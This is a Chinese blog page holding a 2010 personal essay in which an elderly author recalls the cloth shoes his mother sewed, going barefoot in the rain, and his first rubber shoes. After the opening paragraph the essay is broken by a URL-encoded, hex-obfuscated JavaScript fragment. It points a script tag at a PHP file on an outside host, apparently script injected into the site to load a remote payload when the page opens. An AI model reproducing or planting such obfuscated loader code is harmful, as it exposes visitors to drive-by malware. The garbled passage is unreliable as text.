注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

顽石的博客

记录心踪与足迹,夕阳彩霞更绚丽。

 
 
 

日志

 
 

【原创】 鞋  

2010-08-28 17:49:54|  分类: 老叟回首 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

              

 

2010年08月28日 - 顽 石 - 顽石的博客

 

                                                 文/顽石  

    早上就开始阴天,掉了几个雨点又停了。到了晚上,一阵风过去,老天终于憋不住了,下起了雨。一会儿,低洼的地方就汪了水,千千万万条雨丝从天而降,雨点打在水面上,溅起无数的水花和涟漪。

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<    不小不大的秋雨,把我的思绪带到了童年时代。小时候,我们家住在一个小村庄,上学要到二里开外的杏山小学。平时穿的鞋都是老母亲做的布鞋,老母亲把没用的破布积攒下来,有空的时候,打成葛布,再用几层葛布剪成鞋底。那时,我们家里人口比较多,白天做饭,下地,伺弄前后园子,喂鸡鸭喂猪狗,有干不完的活。老母亲只有在晚上,一针一针的纳鞋底,由于布比较碎,用的浆糊多,所以,鞋底纳起来很费劲。油灯一闪一闪的,屋里忽明忽暗,有时一不注意,手就被锥子扎破,鲜血顺着母亲那瘦小的手指流下来,躺在旁边被窝里的我问母亲,“妈疼吗?”“不疼”,我知道十指连心,还有不疼的。看着看着,我就睡着了,母亲为了快点给我们做鞋,常常一干就是深夜。

    布鞋分大上鞋、小上鞋,大上要每层鞋底的边都要包一圈白布,上鞋帮的时候鞋底留出一个宽边,非常好看,但要麻烦很多,又要費不少白布条。小上又分包边和毛边,毛边是最省事的,等我们上学了,母亲都给我们包边了,过年时还给我们一双大上鞋穿。

    上学遇到下雨,我们就把鞋脱下来,拎在手里,光着脚走,怕泥水弄脏了鞋,漚烂了鞋底。那时,特别羡慕在下雨天有胶鞋、雨鞋的同学,看到他们穿着鞋敢在水里走,又不湿,心里痒痒的。突然有一天,父亲进城回来,花三角钱给我也买了一双旧胶鞋,又花钱在漏了的后跟粘了两个掌。看到父亲买的胶鞋,别提多高兴了,整天盼着下雨,下了雨,就可以穿胶鞋,就可以在水里走,鞋里面又不湿。

    那时,有的哥哥在市里边上班,他们逢年过节回来,穿着铮亮铮亮的皮鞋,出门的时候,还要用刷子刷几下,我心里更是羡慕极了。

    如今,生活好了,我不但有胶鞋、雨鞋、皮鞋,还要分高腰低腰、黑色棕色白色,还有毛皮鞋、夹皮鞋、旅游鞋,打太极拳穿的运动鞋等等。不过我还是喜欢穿布鞋,布鞋养脚,方便,鞋都是老伴到街里买的,十几元一双。

    一穿布鞋,我就自然而然的想起我的老母亲,想起我的老父亲,也不知他们在天国里过的可好?

  评论这张
 
阅读(223)| 评论(61)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017